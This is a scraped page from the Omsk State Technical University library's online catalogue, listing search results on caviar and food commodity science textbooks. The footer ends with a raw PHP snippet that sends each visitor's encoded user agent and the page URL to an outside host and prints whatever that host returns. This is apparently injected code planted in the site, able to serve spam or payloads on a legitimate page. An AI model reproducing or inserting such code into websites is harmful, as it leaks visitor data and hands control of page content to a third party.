Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

116 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ИКРА")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 28
1. 
Товароведение пищевых продуктов [Текст] / В. Б. Тылкин [и др.] ; ред. В. Б. Тылкин, 1980. - 429 с.
Ключевые слова 
СОСТАВ ХИМИЧЕСКИЙ - ПРОДУКТЫ -- КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ -- ПРОДУКТЫ ПИЩЕВЫЕ -- ЗЕРНО -- КРУПА -- МУКА -- ИЗДЕЛИЯ МАКАРОННЫЕ -- ХЛЕБ -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- Овощи -- Плоды -- Грибы -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ПРОДУКТЫ ВКУСОВЫЕ -- ПРЯНОСТИ -- ПРИПРАВА -- КИСЛОТА ПИЩЕВАЯ -- ЧАЙ -- КОФЕ -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- МЯСО -- СУБПРОДУКТЫ -- МЯСО ПТИЦЫ -- МЯСО КРОЛИКОВ -- МОЛОКО -- СЛИВКИ -- ПРОДУКТЫ КИСЛОМОЛОЧНЫЕ -- МОЛОКО СГУЩЕННОЕ -- МОЛОКО СУХОЕ -- МОРОЖЕНОЕ -- СЫР -- МАСЛО КОРОВЬЕ -- ЯЙЦА -- Рыба -- ИКРА -- ЖИР ПИЩЕВОЙ
Держатели документа (Информация об экземплярах) 
2. 
Лощинский В. М. Сервировка и этикет стола [Текст] / В. М. Лощинский, 1998. - 239 с.
Держатели документа (Информация об экземплярах) 
3. 
Кругляков Г. Н. Товароведение продовольственных товаров [Текст] / Г. Н. Кругляков, Г. В. Круглякова, 1998. - 396 с.
Держатели документа (Информация об экземплярах) 
4. 
Репников Б. Т. Товароведение и биохимия рыбных товаров [Текст] / Б. Т. Репников, 2013. - 219 с.
Держатели документа (Информация об экземплярах) 
5. 
Товароведение пищевых продуктов [Текст] / И. Е. Кононенко [и др.], 1983. - 423 с.
Ключевые слова 
СОСТАВ ХИМИЧЕСКИЙ - ПРОДУКТЫ -- КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ -- ПРОДУКТЫ ПИЩЕВЫЕ -- ЗЕРНО -- КРУПА -- МУКА -- ИЗДЕЛИЯ МАКАРОННЫЕ -- ХЛЕБ -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- Овощи -- Плоды -- Грибы -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ПРОДУКТЫ ВКУСОВЫЕ -- ПРЯНОСТИ -- ПРИПРАВА -- КИСЛОТА ПИЩЕВАЯ -- ЧАЙ -- КОФЕ -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- МЯСО -- СУБПРОДУКТЫ -- МЯСО ПТИЦЫ -- МЯСО КРОЛИКОВ -- МОЛОКО -- СЛИВКИ -- ПРОДУКТЫ КИСЛОМОЛОЧНЫЕ -- МОЛОКО СГУЩЕННОЕ -- МОЛОКО СУХОЕ -- МОРОЖЕНОЕ -- СЫР -- МАСЛО КОРОВЬЕ -- ЯЙЦА -- Рыба -- ИКРА -- ЖИР ПИЩЕВОЙ -- МАРГАРИН
Держатели документа (Информация об экземплярах) 
6. 
Кулинарные рецепты: Из "Книги о вкусной и здоровой пище" [Текст] / сост. Л. И. Воробьева ; дар.: Л. К. Жарина, Л. К. Жарина, 1988. - 334, [1] с.
Ключевые слова 
ЗАКУСКА -- БУТЕРБРОД -- САЛАТ -- ИКРА -- ПАШТЕТ -- СОУС -- МАЙОНЕЗ -- БУЛЬОН -- СУП -- ОКРОШКА -- МЯСО -- КОТЛЕТА -- ТЕФТЕЛИ -- ШНИЦЕЛЬ -- ПЕЛЬМЕНИ -- КУРИЦА -- ДИЧЬ -- РЫБА -- МОРЕПРОДУКТ -- ТВОРОЖНИКИ -- ВАРЕНИК -- БЛИНЧИКИ -- ЗАПЕКАНКА -- ПУДИНГ -- ОМЛЕТ -- ОВОЩИ -- ГРИБЫ -- КАРТОФЕЛЬ -- ФОРШМАК -- КАША -- ПЛОВ -- КЛЕЦКИ -- ЧЕБУРЕК -- КУКУРУЗА -- ФАСОЛЬ -- ГОРОХ -- ЧЕЧЕВИЦА -- ПИРОЖОК -- ВАТРУШКА -- БУЛКА -- ОЛАДЬИ -- РУЛЕТ -- ПИРОЖНОЕ -- ТОРТ -- КЕКС -- ПОНЧИК -- ХВОРОСТ -- КИСЕЛЬ -- КОМПОТ -- ЖЕЛЕ -- МУСС -- КРЕМ -- ПУДИНГ -- ШАРЛОТКА -- МАРИНАД -- СОЛЕНЬЕ -- МАРИНАД -- КОНСЕРВИРОВАНИЕ -- ЗАМОРАЖИВАНИЕ -- ЯГОДЫ
Держатели документа (Информация об экземплярах) 
7. 
Салаты и закуски [Текст] / сост. О. А. Воротникова ; дар. В. А. Козлова, 1995. - 395, [1] с.
Держатели документа (Информация об экземплярах) 
8. 
Идентификационная и товарная экспертиза продуктов белкового питания и пищевых жиров [Текст] / Т. Г. Родина [и др.] ; ред. Т. Г. Родина, 2013. - 543, [1] с.
Держатели документа (Информация об экземплярах) 

Состояние продовольственного рынка на современном этапе, в частности насыщение его фальсифицированными и контрафактными товарами, обусловливает необходимость развития методов идентификационной экспертизы.

В учебнике рассмотрены актуальные вопросы идентификационной и товарной экспертизы продуктов; назначение и правовые основы идентификации, виды товарной экспертизы. Основное внимание уделяется ассортиментной и категорийной идентификации товаров, позволяющей выявить признаки фальсификации. В целях гармонизации отечественных и зарубежных подходов к экспертизе качества приводятся сведения о некоторых международных стандартах ФАО/ВОЗ по группе рыбных товаров и морепродуктов.

Для специалистов, бакалавров и магистров, а также для аспирантов, научных работников и специалистов, работающих в области товароведения, товарного менеджмента, маркетинга, технологии, стандартизации и сертификации товаров.

9. 
Идентификационная и товарная экспертиза продуктов белкового питания и пищевых жиров [Текст] / Т. Г. Родина [и др.] ; ред. Т. Г. Родина, 2011. - 543, [1] с.
Держатели документа (Информация об экземплярах) 

Состояние продовольственного рынка на современном этапе, в частности насыщение его фальсифицированными и контрафактными товарами, обусловливает необходимость развития методов идентификационной экспертизы.

В учебнике рассмотрены актуальные вопросы идентификационной и товарной экспертизы продуктов; назначение и правовые основы идентификации, виды товарной экспертизы. Основное внимание уделяется ассортиментной и категорийной идентификации товаров, позволяющей выявить признаки фальсификации. В целях гармонизации отечественных и зарубежных подходов к экспертизе качества приводятся сведения о некоторых международных стандартах ФАО/ВОЗ по группе рыбных товаров и морепродуктов.

Для специалистов, бакалавров и магистров, а также для аспирантов, научных работников и специалистов, работающих в области товароведения, товарного менеджмента, маркетинга, технологии, стандартизации и сертификации товаров.

10. 
Товароведение и экспертиза потребительских товаров [Текст] / В. В. Шевченко [и др.] ; рук. работы В. В. Шевченко, 2014. - 751 с.
Ключевые слова 
ТОВАРОВЕДЕНИЕ ПОТРЕБИТЕЛЬСКИХ ТОВАРОВ -- ЭКСПЕРТИЗА ПОТРЕБИТЕЛЬСКИХ ТОВАРОВ -- ТОВАРОВЕДЕНИЕ - ТЕОРИЯ -- КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ -- КЛАССИФИКАЦИЯ ТОВАРА -- КОДИРОВАНИЕ ТОВАРА -- СОСТАВ ХИМИЧЕСКИЙ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ВОДА -- ВЕЩЕСТВА МИНЕРАЛЬНЫЕ -- УГЛЕВОДЫ -- ЛИПИДЫ -- ЖИРЫ -- ЛИПОИДЫ -- ВЕЩЕСТВА АЗОТСОДЕРЖАЩИЕ -- ВИТАМИН -- ФЕРМЕНТ -- КИСЛОТА ОРГАНИЧЕСКАЯ -- КОНСЕРВИРОВАНИЕ ПИЩЕВЫХ ПРОДУКТОВ -- ТАРА -- МАТЕРИАЛ УПАКОВОЧНЫЙ -- МАРКИРОВКА ПИЩЕВОЙ ПРОДУКЦИИ -- ТОВАРЫ ЗЕРНОМУЧНЫЕ -- ЗЕРНО -- КРУПА -- МУКА -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- ИЗДЕЛИЯ БАРАНОЧНЫЕ -- ИЗДЕЛИЯ СУХАРНЫЕ -- ИЗДЕЛИЯ МАКАРОННЫЕ -- КОНЦЕНТРАТ ПИЩЕВОЙ -- ПЛОДЫ СВЕЖИЕ -- ЯГОДЫ -- ОРЕХИ -- ОВОЩИ -- ТОВАРЫ ВКУСОВЫЕ -- ПРЯНОСТИ -- ПРИПРАВА -- ЧАЙ -- КОФЕ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК АЛКОГОЛЬНЫЙ -- ВИНО ВИНОГРАДНОЕ -- БРЕНДИ -- КОНЬЯК -- ИЗДЕЛИЯ ТАБАЧНЫЕ -- КРАХМАЛ -- КРАХМАЛОПРОДУКТЫ -- САХАР -- ЗАМЕНИТЕЛЬ САХАРА -- МЕД -- ТОВАРЫ КОНДИТЕРСКИЕ -- СЛАДОСТИ ВОСТОЧНЫЕ -- ТОВАРОВЕДЕНИЕ МОЛОЧНЫХ ТОВАРОВ -- МОЛОКО -- КОНСЕРВЫ МОЛОЧНЫЕ -- СЫР -- МАСЛО -- МОРОЖЕНОЕ -- ЖИРЫ -- ЖИР ПИЩЕВОЙ -- ТОВАРОВЕДЕНИЕ ПИЩЕВЫХ ЖИРОВ -- МАСЛО РАСТИТЕЛЬНОЕ -- ЖИР ТОПЛЕНЫЙ -- МАРГАРИН -- МАЙОНЕЗ -- ТОВАРОВЕДЕНИЕ МЯСНЫХ ПРОДУКТОВ -- МЯСО -- МЯСО ПТИЦЫ -- КОНСЕРВЫ МЯСНЫЕ -- ПОЛУФАБРИКАТЫ МЯСНЫЕ -- ЯЙЦА -- ЯЙЦЕПРОДУКТЫ -- ТОВАРОВЕДЕНИЕ РЫБНЫХ ПРОДУКТОВ -- РЫБА -- КОНСЕРВЫ РЫБНЫЕ -- ИКРА -- ПОЛУФАБРИКАТЫ РЫБНЫЕ -- МОРЕПРОДУКТЫ
Держатели документа (Информация об экземплярах) 
11. 
Клейменов И. Икра красной и частиковой рыбы. Способы приготовления в Астраханском крае [Текст] / И. Клейменов, 1928. - 23 с. с.
Держатели документа (Информация об экземплярах) 
12. 
Чепурной, И. П. Идентификация и фальсификация продовольственных товаров [Текст] : учебник / И. П. Чепурной, 2002. - 460 с.
Держатели документа (Информация об экземплярах) 
13. 
Шевченко, Вера Валерьяновна. Товароведение и экспертиза качества рыбы и рыбных товаров [Текст] : Уч.пособие гриф-УМО / В.В. Шевченко, 2005. - 253 с.
Держатели документа (Информация об экземплярах) 
14. 
Товароведение продовольственных товаров [Текст] : Уч.пособие / Л. А. Боровикова, В. А. Герасимова, А. М. Евдокимов, 1988. - 352 с.
Ключевые слова 
ТОВАРОВЕДЕНИЕ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ТОВАРОВЕДЕНИЕ - ТЕОРИЯ -- СОСТАВ ХИМИЧЕСКИЙ ПРОДУКТОВ -- ПОЛЕЗНОСТЬ ПИЩЕВЫХ ПРОДУКТОВ -- КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ -- СТАНДАРТИЗАЦИЯ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- КЛАССИФИКАЦИЯ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ХРАНЕНИЕ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ТАРА -- МАТЕРИАЛ УПАКОВОЧНЫЙ -- КОНСЕРВИРОВАНИЕ ПРОДТОВАРОВ -- ПОТЕРИ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- МИКРОБИОЛОГИЯ ПИЩЕВЫХ ПРОДУКТОВ -- ТОВАРЫ ЗЕРНОМУЧНЫЕ -- ОВОЩИ -- ПЛОДЫ -- ГРИБЫ -- ТОВАРЫ ВКУСОВЫЕ -- КРАХМАЛ -- САХАР -- МЕД -- ТОВАРЫ КОНДИТЕРСКИЕ -- ЖИР ПИЩЕВОЙ -- МОЛОКО -- ТОВАРЫ МОЛОЧНЫЕ -- МЯСО -- ТОВАРЫ РЫБНЫЕ -- ЯЙЦА -- ЯЙЦЕПРОДУКТЫ -- РЫБА -- ТОВАРЫ РЫБНЫЕ -- ИКРА -- КОНСЕРВЫ РЫБНЫЕ -- ПРЕСЕРВЫ РЫБНЫЕ
Держатели документа (Информация об экземплярах) 
15. 
Товароведение и экспертиза потребительских товаров [Текст] : Учебник для студентов торговых вузов / рук. авт. кол. В.В. Шевченко, 2003. - 544 с.
Ключевые слова 
товароведение -- экспертиза товаров -- ЗЕРНОМУЧНЫЕ ТОВАРЫ -- КОНДИТЕРСКИЕ ТОВАРЫ -- МОЛОЧНЫЕ ТОВАРЫ -- ПИЩЕВЫЕ ЖИРЫ -- МЯСНЫЕ ТОВАРЫ -- РЫБНЫЕ ТОВАРЫ -- ТОВАРОВЕДЕНИЕ -- КОНСЕРВИРОВАНИЕ -- ТАРА -- УПАКОВКА -- КРУПА -- МУКИ -- ХЛЕБ -- ХЛЕБОБУЛОЧНЫЕ ИЗДЕЛИЯ -- МАКАРОННЫЕ ИЗДЕЛИЯ -- ТОВАРОВЕДЕНИЕ ПЛОДОВ И ОВОЩЕЙ -- ГРИБЫ -- ЧАЙ -- КОФЕ -- НАПИТКИ БЕЗАЛКОГОЛЬНЫЕ -- НАПИТКИ АЛКОГОЛЬНЫЕ -- ТАБАЧНАЯ ПРОДУКЦИЯ -- ПРЯНОСТИ -- ПРИПРАВЫ -- МЕД -- ТОВАРОВЕДЕНИЕ КОНДИТЕРСКИХ ТОВАРОВ -- ТОВАРОВЕДЕНИЕ МОЛОЧНЫХ ТОВАРОВ -- СЫР -- МОРОЖЕНОЕ -- МАЙОНЕЗ -- МЯСНЫЕ КОНСЕРВЫ -- ПОЛУФАБРИКАТЫ -- ЯЙЦА -- ИКРА
Держатели документа (Информация об экземплярах) 
16. 
Шепелев А. Ф. Товароведение и экспертиза рыбы и рыбных товаров [Текст] : Учеб. пособие для студ. высш. учеб. заведений / А. Ф. Шепелев, О. И. Кожухова. - 154 с.
17. 
Васюкова А. Т. Переработка рыбы и морепродуктов [Текст] / А. Т. Васюкова, 2012. - 102 с.
Держатели документа (Информация об экземплярах) 
18. 
Чепурной И. П. Идентификация и фальсификация продовольственных товаров [Текст] : учеб. / И. П. Чепурной , 2007. - 459 с.
Держатели документа (Информация об экземплярах) 
19. 
Голубев В. Н. Обработка рыбы и морепродуктов [Текст] : учеб. для учреждений нач. проф. образования / В. Н. Голубев, Т. Н. Назаренко, Е. И. Цыбулько, 2001. - 185 с.
Держатели документа (Информация об экземплярах) 
20. 
Товароведение и экспертиза потребительских товаров [Текст] : учеб. для торговых учеб. заведений / И. А. Ермилова [и др.], 2007. - 542, [1] с.

В учебнике изложены предмет и задачи, теоретические основы товароведения, классификация, химический состав, пищевая ценность отдельных групп товаров. Даны современные особенности технологии отечественных и импортных продуктов. Особое внимание уделяется сертификации и проведению экспертизы товаров растительного и животного происхождения.



    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3023 - 19.09.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.91 с.12 запросов, 0.55c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;